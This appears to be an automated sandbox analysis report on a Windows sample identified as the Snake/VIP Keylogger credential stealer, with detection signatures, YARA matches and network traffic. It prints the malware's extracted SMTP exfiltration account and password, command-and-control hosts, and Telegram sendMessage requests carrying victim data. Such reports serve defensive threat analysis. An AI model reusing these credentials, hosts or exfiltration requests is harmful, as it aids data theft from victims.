Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1582677
MD5:3b2a532f5145a1e1a1d04daf8119caf1
SHA1:850db92a1aea8c8a7ba5a940c9f9ab19c31ce9a4
SHA256:49039b4b47513f22a7e396b57a73abe02b0032a09089e8fa68c94c0eae655d6b
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3B2A532F5145A1E1A1D04DAF8119CAF1)
    • file.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3B2A532F5145A1E1A1D04DAF8119CAF1)
    • WerFault.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d703:$a1: get_encryptedPassword
        • 0x2da20:$a2: get_encryptedUsername
        • 0x2d513:$a3: get_timePasswordChanged
        • 0x2d61c:$a4: get_passwordField
        • 0x2d719:$a5: set_encryptedPassword
        • 0x2edda:$a7: get_logins
        • 0x2ed3d:$a10: KeyLoggerEventArgs
        • 0x2e9a2:$a11: KeyLoggerEventArgsEventHandler
        00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.file.exe.3c2d060.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.file.exe.3c2d060.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.file.exe.3c2d060.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.file.exe.3c2d060.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bb03:$a1: get_encryptedPassword
                • 0x2be20:$a2: get_encryptedUsername
                • 0x2b913:$a3: get_timePasswordChanged
                • 0x2ba1c:$a4: get_passwordField
                • 0x2bb19:$a5: set_encryptedPassword
                • 0x2d1da:$a7: get_logins
                • 0x2d13d:$a10: KeyLoggerEventArgs
                • 0x2cda2:$a11: KeyLoggerEventArgsEventHandler
                0.2.file.exe.3c2d060.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x397c2:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38e65:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x390c2:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39aa1:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T09:15:22.240634+010028033053Unknown Traffic192.168.2.449749188.114.96.3443TCP
                2024-12-31T09:15:24.740290+010028033053Unknown Traffic192.168.2.449751188.114.96.3443TCP
                2024-12-31T09:15:28.946869+010028033053Unknown Traffic192.168.2.449755188.114.96.3443TCP
                2024-12-31T09:15:31.946675+010028033053Unknown Traffic192.168.2.449759188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T09:15:17.975351+010028032742Potentially Bad Traffic192.168.2.449732193.122.6.16880TCP
                2024-12-31T09:15:21.694106+010028032742Potentially Bad Traffic192.168.2.449732193.122.6.16880TCP
                2024-12-31T09:15:24.194291+010028032742Potentially Bad Traffic192.168.2.449750193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T09:15:36.900479+010018100071Potentially Bad Traffic192.168.2.449764149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
                Source: 2.2.file.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logistics@aruzen.co.in", "Password": "Pawsad-xovwut-2zoxso", "Host": "mail.aruzen.co.in", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 42%Perma Link
                Source: file.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2
                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Accessibility.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Drawing.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdbC source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WERB432.tmp.dmp.5.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WERB432.tmp.dmp.5.dr
                Source: Binary string: System.Core.ni.pdb source: WERB432.tmp.dmp.5.dr
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 0158F45Dh2_2_0158F2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 0158F45Dh2_2_0158F52F
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 0158F45Dh2_2_0158F4AC
                Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 0158FC19h2_2_0158F961

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49764 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c70280.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.3c2d060.1.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49748 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 31 Dec 2024 08:15:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: file.exe, 00000000.00000002.1828496079.0000000006D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
                Source: file.exe, 00000002.00000002.4144889269.0000000003253000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: file.exe, 00000002.00000002.4144889269.000000000324E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: file.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: file.exe, 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: file.exe, 00000002.00000002.4144889269.000000000310B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: file.exe, 00000002.00000002.4144889269.0000000003176000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.0000000003150000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000310B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: file.exe, 00000002.00000002.4148149933.0000000004316000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041E7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004364000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.4148149933.0000000004172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
